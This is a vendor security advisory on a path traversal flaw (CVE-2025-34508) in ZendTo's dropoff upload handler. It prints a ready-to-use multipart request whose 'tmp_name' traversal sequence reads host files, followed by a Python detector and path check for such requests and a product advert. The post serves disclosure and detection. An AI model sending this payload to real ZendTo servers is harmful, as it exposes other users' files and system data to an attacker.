ZendTo 'dropoff' - Path Traversal (CVE-2025-34508)
- Dee Sehejpal BSc (HONS)

Application Details
ZendTo is an open-source, web-based tool commonly used by universities, research institutions, and enterprises to securely exchange large files with external users.
Vulnerability
A path traversal vulnerability exists in the file dropoff functionality of ZendTo versions 6.15-7 and prior. This could allow a remote, authenticated attacker to retrieve the files of other ZendTo users, retrieve files on the host system, or cause a denial of service.
Identification
The dropoff request below shows the issue: the `tmp_name` value inside the JSON submitted as `file_1` carries the traversal sequence, and `chunkname` is set to a single dot.
```http
POST /dropoff
--------------------------d74496d66958873e
Content-Disposition: form-data; name="Action"

dropoff
--------------------------d74496d66958873e
Content-Disposition: form-data; name="chunkname"

.
--------------------------d74496d66958873e
Content-Disposition: form-data; name="file_1"

{"name":"zendto.log","type":"","size":"unused","tmp_name":"/../../log/zendto.log","error":0}
--------------------------d74496d66958873e--
```
Detection
By capturing this request as a traffic file and writing a matching rule, we are able to detect directory traversal attempts by an unauthenticated remote attacker.
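The following is an added example, not Idappcom's signature 8026071 and not ZendTo's own code. It shows the two checks a detection rule or a server-side fix would apply to a dropoff request like the one above: parse the multipart body, then flag a `chunkname` that is not a plain file name and a `tmp_name` (inside the `file_N` JSON) that contains a `..` segment or would resolve outside the upload directory. The boundary string, the upload directory `/var/zendto/incoming`, the "safe chunk name" pattern and the sample bodies are assumptions constructed for the example.

```python
import json
import os
import re

# Constructed boundary, modelled on the request quoted in the post (assumption).
BOUNDARY = "------------------------d74496d66958873e"

# A legitimate chunk name is assumed to be a plain file name; "." and ".." cannot match.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")
# A ".." path segment, with either slash style, at any position in the value.
DOT_SEGMENT = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def parse_multipart(body: bytes, boundary: str) -> dict[str, str]:
    """Return {field name: payload text} for a multipart/form-data body."""
    delim = b"--" + boundary.encode()
    fields: dict[str, str] = {}
    for raw_part in body.split(delim):
        part = raw_part.strip(b"\r\n")
        if not part or part == b"--":          # preamble / closing "--" terminator
            continue
        head, _, payload = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode()] = payload.decode(errors="replace")
    return fields


def resolves_inside(base_dir: str, relative: str) -> bool:
    """True if joining `relative` onto `base_dir` stays inside `base_dir` after normalisation.

    Uses normpath rather than realpath so it runs without touching the filesystem;
    a real deployment would also resolve symlinks with os.path.realpath.
    """
    base = os.path.normpath(os.path.abspath(base_dir))
    target = os.path.normpath(os.path.join(base, relative.lstrip("/\\")))
    return os.path.commonpath([base, target]) == base


def inspect_dropoff(body: bytes, boundary: str,
                    base_dir: str = "/var/zendto/incoming") -> list[str]:
    """Return a list of findings; an empty list means the request looks benign."""
    findings: list[str] = []
    fields = parse_multipart(body, boundary)

    chunk = fields.get("chunkname")
    if chunk is not None and not SAFE_NAME.fullmatch(chunk):
        findings.append(f"chunkname is not a plain file name: {chunk!r}")

    for name, value in fields.items():
        if not name.startswith("file_"):
            continue
        try:
            meta = json.loads(value)
        except json.JSONDecodeError:
            findings.append(f"{name}: metadata is not valid JSON")
            continue
        tmp = str(meta.get("tmp_name", ""))
        if DOT_SEGMENT.search(tmp) or not resolves_inside(base_dir, tmp):
            findings.append(f"{name}: tmp_name escapes the upload directory: {tmp!r}")
    return findings


def build_multipart(fields: list[tuple[str, str]], boundary: str = BOUNDARY) -> bytes:
    """Assemble a constructed multipart/form-data body for the samples below."""
    out = b""
    for name, value in fields:
        out += (f"--{boundary}\r\nContent-Disposition: form-data; name=\"{name}\""
                f"\r\n\r\n{value}\r\n").encode()
    return out + f"--{boundary}--\r\n".encode()


# Constructed sample bodies: the traversal request from the post, and a benign upload.
MALICIOUS_BODY = build_multipart([
    ("Action", "dropoff"),
    ("chunkname", "."),
    ("file_1", json.dumps({"name": "zendto.log", "type": "", "size": "unused",
                           "tmp_name": "/../../log/zendto.log", "error": 0})),
])
BENIGN_BODY = build_multipart([
    ("Action", "dropoff"),
    ("chunkname", "chunk_0001"),
    ("file_1", json.dumps({"name": "report.pdf", "type": "application/pdf",
                           "size": "unused", "tmp_name": "phpA1b2C3", "error": 0})),
])

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_dropoff(body, BOUNDARY))
```

Run as a script it prints two findings for the malicious body (the dot `chunkname` and the escaping `tmp_name`) and none for the benign one. The `resolves_inside` check is the server-side counterpart of the network signature: whatever path the client supplies, the upload handler only proceeds if the normalised result is still under the upload directory.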
Coverage
Idappcom have created signature 8026071 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional